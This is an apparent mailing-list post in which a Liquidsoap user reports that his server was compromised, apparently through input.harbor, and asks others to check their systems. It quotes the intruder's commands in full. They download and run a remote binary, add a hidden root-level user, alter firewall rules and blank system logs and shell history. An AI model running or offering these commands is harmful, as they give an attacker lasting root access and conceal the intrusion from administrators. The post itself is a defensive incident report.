From: Mauro D. <mau...@gm...> - 2016-02-02 21:51:52
|
Guys, I'm using the liquidsoap for some time, I have enabled the "input.harbor" in my script, it is a dynamic script that always generates User and password dynamically. I saw that when enabled "input.harbor" I my machine is invaded and runs on my machine the following commands bellow, I formatted 3 times the machine and I did several tests and yes, the security hole that allows access to my machine is when the "input.harbor" is enabled. Basically what I noticed is that the invader installs a SYS flood in my machine, nothing more than that, but this is very serious. Please who have "input.harbor" enabled can verify that? Check the user "webll" in your /etc/passwd ip where does the connection comes from *104.239.228.251* *Commands run on my machine at all access * ps -ef 2 cd /bin 3 wget http://58.64.207.219:888/sshh 4 chmod 0755 sshh 5 ./sshh 6 useradd -o -u 0 -g 0 -M -d /root -s /bin/bash webll 7 passwd webll 8 iptables -I INPUT -s 127.0.0.1 -p tcp --dport 6379 -j ACCEPT 9 iptables -D INPUT -p tcp --dport 6379 -j DROP 10 echo>ar/log/syslog 11 echo>ar/log/messages 12 echo>ar/logtpd/access_log 13 echo>ar/logtpd/error_log0 14 echo>ar/log/xferlog 15 echo>ar/logcure 16 echo>ar/log/auth.log 17 echo>ar/log/user.log 18 echo>ar/log/wtmp 19 echo>ar/log/lastlog 20 echo>ar/log/btmp 21 echo>ar/run/utmp 22 echo >/root/.bash_history 23 history-c live = input.harbor( id = "#{mount_name}", on_connect = live_start, on_disconnect = live_stop, buffer=8., max=20., icy = true, port = int_of_string(port2), *Dynamic port * user = "#{mount_name}", *Dynamic mount point* password = "#{streamingPasswordHarbor}", *Dynamic Password* "#{mount_name}") root@liquidsoap:/home/ubuntu/live# *uname -a* *Linux liquidsoap 3.13.0-74-generic #118-Ubuntu SMP Thu Dec 17 22:52:10 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux* root@liquidsoap:/home/ubuntu/live# *liquidsoap --version* *Liquidsoap 1.2.0+scm (git://github.com/savonet/liquidsoap.git@5828d260cbaafb13952f0b65b7abd9867ea72308:20160202:091347 <http://github.com/savonet/liquidsoap.git@5828d260cbaafb13952f0b65b7abd9867ea72308:20160202:091347>)* Copyright (c) 2003-2016 Savonet team Liquidsoap is open-source software, released under GNU General Public License. See <http://liquidsoap.fm> for more information. -- Mauro Delazeri +1 646 275 7568 New York - NY |